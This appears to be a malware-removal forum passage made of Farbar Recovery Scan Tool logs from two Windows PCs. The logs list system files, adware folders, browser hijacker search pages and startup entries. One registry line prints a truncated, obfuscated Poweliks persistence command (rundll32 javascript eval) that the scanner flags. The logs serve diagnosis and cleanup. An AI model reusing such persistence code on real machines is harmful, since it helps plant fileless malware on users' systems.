C:\Windows\SysWOW64\shell32.dll 2015-04-03 08:46 - 2015-02-13 00:22 - 14177280 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll 2015-04-03 08:46 - 2015-02-02 22:31 - 01424896 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll 2015-04-03 08:46 - 2015-02-02 22:31 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\ubpm.dll 2015-04-03 08:46 - 2015-02-02 22:12 - 01230848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WindowsCodecs.dll 2015-04-03 08:46 - 2015-02-02 22:12 - 00171520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ubpm.dll 2015-04-03 08:46 - 2015-01-16 21:48 - 01067520 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll 2015-04-03 08:46 - 2015-01-16 21:30 - 00828928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctf.dll 2015-04-03 08:46 - 2014-12-18 20:46 - 00141312 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys 2015-04-03 08:46 - 2014-12-07 22:09 - 00406528 _____ (Microsoft Corporation) C:\Windows\system32\scesrv.dll 2015-04-03 08:46 - 2014-12-07 21:46 - 00308224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\scesrv.dll 2015-04-03 08:46 - 2014-12-05 23:17 - 00303616 _____ (Microsoft Corporation) C:\Windows\system32\nlasvc.dll 2015-04-03 08:46 - 2014-12-05 22:50 - 00156672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncsi.dll 2015-04-03 08:46 - 2014-12-05 22:50 - 00052224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\nlaapi.dll 2015-04-03 08:46 - 2014-11-25 22:53 - 00861696 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll 2015-04-03 08:46 - 2014-11-25 22:32 - 00571904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll 2015-04-03 08:46 - 2014-10-03 21:10 - 03722752 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll 2015-04-03 08:46 - 2014-10-03 20:42 - 03221504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll 2015-04-03 08:46 - 2014-10-03 20:42 - 00131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll 2015-04-03 08:46 - 2014-10-02 21:12 - 02020352 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll 2015-04-03 08:46 - 2014-10-02 21:12 - 00346624 _____ (Microsoft Corporation) C:\Windows\system32\WSManMigrationPlugin.dll 2015-04-03 08:46 - 2014-10-02 21:12 - 00310272 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll 2015-04-03 08:46 - 2014-10-02 21:12 - 00181248 _____ (Microsoft Corporation) C:\Windows\system32\WsmAuto.dll 2015-04-03 08:46 - 2014-10-02 21:11 - 00266240 _____ (Microsoft Corporation) C:\Windows\system32\WSManHTTPConfig.exe 2015-04-03 08:46 - 2014-10-02 20:45 - 01177088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll 2015-04-03 08:46 - 2014-10-02 20:45 - 00248832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManMigrationPlugin.dll 2015-04-03 08:46 - 2014-10-02 20:45 - 00214016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll 2015-04-03 08:46 - 2014-10-02 20:45 - 00145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmAuto.dll 2015-04-03 08:46 - 2014-10-02 20:44 - 00198656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManHTTPConfig.exe 2015-04-03 08:46 - 2014-07-16 21:07 - 01118720 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe 2015-04-03 08:46 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe 2015-04-03 08:46 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll 2015-04-03 08:46 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll 2015-04-03 08:46 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll 2015-04-03 08:46 - 2014-07-16 20:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe 2015-04-03 08:46 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys 2015-04-03 08:46 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys 2015-04-03 08:46 - 2014-06-17 21:18 - 00692736 _____ (Microsoft Corporation) C:\Windows\system32\osk.exe 2015-04-03 08:46 - 2014-06-17 20:51 - 00646144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\osk.exe 2015-04-03 08:46 - 2014-03-26 09:44 - 02002432 _____ (Microsoft Corporation) C:\Windows\system32\msxml6.dll 2015-04-03 08:46 - 2014-03-26 09:41 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\msxml6r.dll 2015-04-03 08:46 - 2014-03-26 09:27 - 01389056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml6.dll 2015-04-03 08:46 - 2014-03-26 09:25 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml6r.dll 2015-04-03 08:46 - 2013-10-03 21:28 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\SmartcardCredentialProvider.dll 2015-04-03 08:46 - 2013-10-03 21:25 - 00197120 _____ (Microsoft Corporation) C:\Windows\system32\credui.dll 2015-04-03 08:46 - 2013-10-03 20:58 - 00152576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SmartcardCredentialProvider.dll 2015-04-03 08:46 - 2013-10-03 20:56 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credui.dll 2015-04-03 08:46 - 2013-07-20 05:33 - 00124112 _____ (Microsoft Corporation) C:\Windows\system32\PresentationCFFRasterizerNative_v0300.dll 2015-04-03 08:46 - 2013-07-20 05:33 - 00102608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationCFFRasterizerNative_v0300.dll 2015-04-03 08:46 - 2011-02-18 05:51 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\prevhost.exe 2015-04-03 08:46 - 2011-02-18 00:39 - 00031232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\prevhost.exe 2015-04-03 08:45 - 2015-02-03 22:16 - 00465920 _____ (Microsoft Corporation) C:\Windows\system32\WMPhoto.dll 2015-04-03 08:45 - 2015-02-03 21:54 - 00417792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMPhoto.dll 2015-04-03 08:44 - 2015-04-03 10:11 - 00000000 ____D () C:\PTC 2015-04-03 08:41 - 2015-04-03 08:41 - 00000000 ____D () C:\PTC_Client 2015-04-03 08:40 - 2015-04-03 08:40 - 00000000 ____H () C:\Windows\system32\Drivers\Msft_User_WpdFs_01_09_00.Wdf 2015-04-02 15:16 - 2015-04-02 15:16 - 00003238 _____ () C:\Windows\System32\Tasks\Super Optimizer Schedule 2015-04-02 15:10 - 2015-04-23 15:23 - 00000284 _____ () C:\Windows\Tasks\UpdaterEX.job 2015-04-02 15:10 - 2015-04-23 10:59 - 00000000 ____D () C:\ProgramData\Spyware Clear 2015-04-02 15:10 - 2015-04-03 13:18 - 00000000 ____D () C:\Program Files (x86)\Spyware Clear 2015-04-02 15:10 - 2015-04-02 15:11 - 00003218 _____ () C:\Windows\System32\Tasks\UpdaterEX 2015-04-02 15:10 - 2015-04-02 15:10 - 00000000 ____D () C:\Program Files (x86)\Super Optimizer 2015-04-02 15:10 - 2015-04-02 15:10 - 00000000 ____D () C:\Program Files (x86)\PCTechHotline 2015-04-02 10:10 - 2015-04-02 10:10 - 00000000 ____D () C:\ProgramData\softthinks 2015-04-02 10:10 - 2014-08-13 11:19 - 00000113 ____H () C:\DBAR_Ver.txt 2015-04-02 10:04 - 2015-04-02 10:04 - 00001979 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell Help Documentation.lnk ==================== One Month Modified Files and Folders ======= (If an entry is included in the fixlist, the file\folder will be moved.) 2015-04-23 15:24 - 2015-03-12 12:28 - 02009351 _____ () C:\Windows\WindowsUpdate.log 2015-04-23 15:23 - 2015-03-12 12:36 - 00242658 _____ () C:\Windows\SysWOW64\Gms.log 2015-04-23 15:23 - 2015-03-12 12:28 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job 2015-04-23 14:08 - 2009-07-13 23:45 - 00021088 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2015-04-23 14:08 - 2009-07-13 23:45 - 00021088 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2015-04-23 14:07 - 2015-03-12 12:41 - 00000000 ____D () C:\Program Files (x86)\Dell Backup and Recovery 2015-04-23 14:04 - 2009-07-14 00:13 - 00783606 _____ () C:\Windows\system32\PerfStringBackup.INI 2015-04-23 14:00 - 2015-03-12 12:29 - 00000000 ____D () C:\ProgramData\NVIDIA 2015-04-23 14:00 - 2010-11-20 22:47 - 00170256 _____ () C:\Windows\PFRO.log 2015-04-23 14:00 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT 2015-04-23 14:00 - 2009-07-13 23:51 - 00043429 _____ () C:\Windows\setupact.log 2015-04-23 14:00 - 2009-07-13 23:45 - 00327096 _____ () C:\Windows\system32\FNTCACHE.DAT 2015-04-23 13:59 - 2009-07-13 22:20 - 00000000 __RHD () C:\Users\Public\Libraries 2015-04-23 13:12 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache 2015-04-23 11:47 - 2009-07-13 22:20 - 00000000 ____D () C:\Program Files\Common Files\Microsoft Shared 2015-04-21 18:25 - 2009-07-14 00:09 - 00000000 ____D () C:\Windows\System32\Tasks\WPD 2015-04-21 16:27 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\AppCompat 2015-04-18 12:38 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\NDF 2015-04-18 12:34 - 2011-02-10 09:33 - 00776212 _____ () C:\Windows\SysWOW64\PerfStringBackup.INI 2015-04-18 12:34 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\tracing 2015-04-18 12:34 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\SysWOW64\Dism 2015-04-18 12:34 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\Dism 2015-04-18 12:34 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\PolicyDefinitions 2015-04-18 12:34 - 2009-07-13 22:20 - 00000000 ____D () C:\Program Files\Common Files\System 2015-04-16 12:43 - 2015-03-12 12:41 - 00000000 ____D () C:\ProgramData\Adobe 2015-04-03 13:13 - 2011-02-10 09:25 - 00000000 ____D () C:\dell 2015-04-02 11:20 - 2015-03-12 12:29 - 00000000 ____D () C:\Program Files\Dell 2015-04-02 10:09 - 2015-03-12 12:31 - 00000000 ____D () C:\ProgramData\Intel 2015-04-02 10:04 - 2015-03-12 12:29 - 00000000 ____D () C:\ProgramData\Dell 2015-04-02 09:59 - 2011-02-10 09:25 - 00000000 ____D () C:\Windows\panther ==================== Files in the root of some directories ======= 2015-04-23 11:39 - 2015-04-23 11:39 - 0000020 _____ () C:\Users\tboe\AppData\Roaming\appdataFr3.bin 2015-04-16 10:21 - 2015-04-23 14:00 - 0000070 _____ () C:\Users\tboe\AppData\Roaming\WB.CFG 2015-04-06 18:42 - 2015-04-17 10:19 - 0000600 _____ () C:\Users\tboe\AppData\Local\PUTTY.RND Some content of TEMP: ==================== C:\Users\tboe\AppData\Local\Temp\PriceFountainUpdateVer.exe C:\Users\tboe\AppData\Local\Temp\SetupHomeBusinessRetail.x86.en-US_HomeBusinessRetail_4RMHN-K79VX-6M4XV-K2CQ4-YR96P_act_1_.exe ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\System32\winlogon.exe => File is digitally signed C:\Windows\System32\wininit.exe => File is digitally signed C:\Windows\SysWOW64\wininit.exe => File is digitally signed C:\Windows\explorer.exe => File is digitally signed C:\Windows\SysWOW64\explorer.exe => File is digitally signed C:\Windows\System32\svchost.exe => File is digitally signed C:\Windows\SysWOW64\svchost.exe => File is digitally signed C:\Windows\System32\services.exe => File is digitally signed C:\Windows\System32\User32.dll => File is digitally signed C:\Windows\SysWOW64\User32.dll => File is digitally signed C:\Windows\System32\userinit.exe => File is digitally signed C:\Windows\SysWOW64\userinit.exe => File is digitally signed C:\Windows\System32\rpcss.dll => File is digitally signed C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2015-04-21 16:26 ==================== End Of Log ============================ Addition.txtFRST.txt
  21. Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 10-11-2014 Ran by Ryan (administrator) on RYAN-PC on 12-11-2014 16:21:33 Running from C:\Users\Ryan\Downloads Loaded Profile: Ryan (Available profiles: Ryan) Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States) Internet Explorer Version 11 Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe (Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe (Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe (Symantec Corporation) C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\n360.exe (Alcatel-Lucent) C:\Program Files (x86)\Common Files\Motive\pcCMService.exe (Alcatel-Lucent) C:\Program Files\Common Files\Motive\pcCMService.exe (Alcatel-Lucent) C:\Program Files (x86)\Common Files\Motive\pcServiceHost.exe (Intuit) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleCrashHandler.exe (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleCrashHandler64.exe (Symantec Corporation) C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\n360.exe () C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe (Alcatel-Lucent) C:\Program Files\ATT-SST\pcTrayApp.exe (Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Advisor\HPAdvisor.exe (SwapDrive, Inc.) C:\Program Files (x86)\QuickBooks Online Backup\OnlineBackup.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe (CyberLink) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe (TechSmith Corporation) C:\Program Files (x86)\TechSmith\Jing\Jing.exe (Spotify Ltd) C:\Users\Ryan\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe (Alcatel-Lucent) C:\Program Files (x86)\Common Files\Motive\pcContextHookShim.exe (Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe (Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe (Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe (Dropbox, Inc.) C:\Users\Ryan\AppData\Roaming\Dropbox\bin\Dropbox.exe (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) C:\Program Files (x86)\Evernote\Evernote\EvernoteClipper.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe (Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Microsoft Corporation) C:\Windows\System32\msiexec.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [NvCplDaemon] => RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup HKLM\...\Run: [smartMenu] => C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe [610360 2009-09-14] () HKLM\...\Run: [PC-Doctor for Windows localizer] => C:\Program Files\PC-Doctor for Windows\localizer.exe [95728 2009-09-16] (PC-Doctor, Inc.) HKLM\...\Run: [ATT-SST_McciTrayApp] => C:\Program Files\ATT-SST\pcTrayApp.exe [2727936 2012-06-07] (Alcatel-Lucent) HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [157480 2014-10-15] (Apple Inc.) HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.) HKLM\...\RunOnce: [NCPluginUpdater] => C:\Program Files (x86)\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe [21720 2014-10-21] (Hewlett-Packard) HKLM-x32\...\RunOnce: [DelTr1171583] => cmd.exe /c rd /s /q "C:\Users\Ryan\AppData\Roaming\WSE_Lasaoren" HKU\S-1-5-21-3275123363-4289498944-2812251985-1000\...\Run: [HPADVISOR] => C:\Program Files (x86)\Hewlett-Packard\HP Advisor\HPAdvisor.exe [1685048 2009-09-29] (Hewlett-Packard) HKU\S-1-5-21-3275123363-4289498944-2812251985-1000\...\Run: [OnlineBackupScheduler] => C:\Program Files (x86)\QuickBooks Online Backup\OnlineBackup.exe [610304 2007-11-02] (SwapDrive, Inc.) HKU\S-1-5-21-3275123363-4289498944-2812251985-1000\...\Run: [AdobeBridge] => [X] HKU\S-1-5-21-3275123363-4289498944-2812251985-1000\...\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [43816 2014-10-17] (Apple Inc.) HKU\S-1-5-21-3275123363-4289498944-2812251985-1000\...\Run: [ApplePhotoStreams] => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [43816 2014-10-17] (Apple Inc.) HKU\S-1-5-21-3275123363-4289498944-2812251985-1000\...\Run: [Jing] => C:\Program Files (x86)\TechSmith\Jing\Jing.exe [2909640 2013-01-07] (TechSmith Corporation) HKU\S-1-5-21-3275123363-4289498944-2812251985-1000\...\Run: [spotify] => C:\Users\Ryan\AppData\Roaming\Spotify\Spotify.exe [6553144 2014-10-08] (Spotify Ltd) HKU\S-1-5-21-3275123363-4289498944-2812251985-1000\...\Run: [spotify Web Helper] => C:\Users\Ryan\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe [1514040 2014-10-08] (Spotify Ltd) HKU\S-1-5-21-3275123363-4289498944-2812251985-1000\...\Run: [bRS] => C:\Program Files (x86)\WSE_Astromenda\BRS\brs.exe -runBRS HKU\S-1-5-21-3275123363-4289498944-2812251985-1000\...\Run: [skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [22065760 2014-10-01] (Skype Technologies S.A.) HKU\S-1-5-21-3275123363-4289498944-2812251985-1000\...\RunOnce: [DelTr1171583] => cmd.exe /c rd /s /q "C:\Users\Ryan\AppData\Roaming\WSE_Lasaoren" HKU\S-1-5-21-3275123363-4289498944-2812251985-1000\...\RunOnce: [WSE_Lasaoren] => [X] HKU\S-1-5-21-3275123363-4289498944-2812251985-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks! Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Install LastPass FF RunOnce.lnk ShortcutTarget: Install LastPass FF RunOnce.lnk -> C:\Program Files (x86)\Common Files\lpuninstall.exe (LastPass) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Install LastPass IE RunOnce.lnk ShortcutTarget: Install LastPass IE RunOnce.lnk -> C:\Program Files (x86)\Common Files\lpuninstall.exe (LastPass) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Online Backup Scheduler.lnk ShortcutTarget: Online Backup Scheduler.lnk -> C:\Windows\Installer\{A9255718-8A40-45F9-B738-93655FBD4F6F}\_C90BDFE323B95CEE248723.exe () Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\PictureMover.lnk ShortcutTarget: PictureMover.lnk -> C:\Program Files (x86)\PictureMover\Bin\PictureMover.exe (Hewlett-Packard Company) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks Update Agent.lnk ShortcutTarget: QuickBooks Update Agent.lnk -> C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe (Intuit Inc.) Startup: C:\Users\Ryan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk ShortcutTarget: Dropbox.lnk -> C:\Users\Ryan\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.) Startup: C:\Users\Ryan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EvernoteClipper.lnk ShortcutTarget: EvernoteClipper.lnk -> C:\Program Files (x86)\Evernote\Evernote\EvernoteClipper.exe (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) ShellIconOverlayIdentifiers: [OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\buShell.dll (Symantec Corporation) ShellIconOverlayIdentifiers: [OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\buShell.dll (Symantec Corporation) ShellIconOverlayIdentifiers: [OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\buShell.dll (Symantec Corporation) CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://Lasaoren.com/...cr=90030310&ir= HKCU\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = http://www.mysearchlinks.com/ SearchScopes: HKLM - DefaultScope {5E6E1618-3BEA-4A6A-AC43-80B3F54CE1CB} URL = http://astromenda.co...=1230190011&ir= SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM - {2E00D31D-D171-423D-836D-1A4D7EA7F1A9} URL = http://Lasaoren.com/...cr=90030310&ir= SearchScopes: HKLM - {5E6E1618-3BEA-4A6A-AC43-80B3F54CE1CB} URL = http://astromenda.co...=1230190011&ir= SearchScopes: HKLM - {CCA70054-9FB7-46C4-A32D-B64843035997} URL = http://www.ask.com/w...}&l=dis&o=ushpd SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 - {CCA70054-9FB7-46C4-A32D-B64843035997} URL = http://www.ask.com/w...}&l=dis&o=ushpd SearchScopes: HKCU - DefaultScope {2E00D31D-D171-423D-836D-1A4D7EA7F1A9} URL = http://Lasaoren.com/...cr=90030310&ir= SearchScopes: HKCU - {2E00D31D-D171-423D-836D-1A4D7EA7F1A9} URL = http://Lasaoren.com/...cr=90030310&ir= SearchScopes: HKCU - {5E6E1618-3BEA-4A6A-AC43-80B3F54CE1CB} URL = http://astromenda.co...=1230190011&ir= SearchScopes: HKCU - {9AD1DDCA-9138-4F37-8542-E774CE72FEDC} URL = http://search.yahoo....rtPage?}&fr=ie8 SearchScopes: HKCU - {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = http://www.ask.com/w...il&geo=US&ver=4 SearchScopes: HKCU - {CCA70054-9FB7-46C4-A32D-B64843035997} URL = http://www.ask.com/w...}&l=dis&o=ushpd SearchScopes: HKCU - {EFBAA18C-764F-4320-A142-84ACC4C3AF65} URL = http://search.usatod...w={searchTerms} BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation) BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.) BHO: LastPass Vault -> {95D9ECF5-2A4D-4550-BE49-70D42F71296E} -> C:\Program Files (x86)\LastPass\LPToolbar_x64.dll () BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation) BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll (Hewlett-Packard) BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation) BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\IPS\IPSBHO.DLL (Symantec Corporation) BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation) BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.) BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) BHO-x32: LastPass Vault -> {95D9ECF5-2A4D-4550-BE49-70D42F71296E} -> C:\Program Files (x86)\LastPass\LPToolbar.dll () BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation) BHO-x32: Microsoft Live Search Toolbar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> c:\Program Files (x86)\MSN\Toolbar\3.0.0566.0\msneshellx.dll (Microsoft Corp.) BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation) BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard) Toolbar: HKLM - LastPass Toolbar - {9f6b5cc3-5c7b-4b5c-97af-19dec1e380e5} - C:\Program Files (x86)\LastPass\LPToolbar_x64.dll () Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation) Toolbar: HKLM-x32 - Microsoft Live Search Toolbar - {1E61ED7C-7CB8-49d6-B9E9-AB4C880C8414} - c:\Program Files (x86)\MSN\Toolbar\3.0.0566.0\msneshellx.dll (Microsoft Corp.) Toolbar: HKLM-x32 - LastPass Toolbar - {9f6b5cc3-5c7b-4b5c-97af-19dec1e380e5} - C:\Program Files (x86)\LastPass\LPToolbar.dll () Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation) Toolbar: HKU\S-1-5-21-3275123363-4289498944-2812251985-1000 -> No Name - 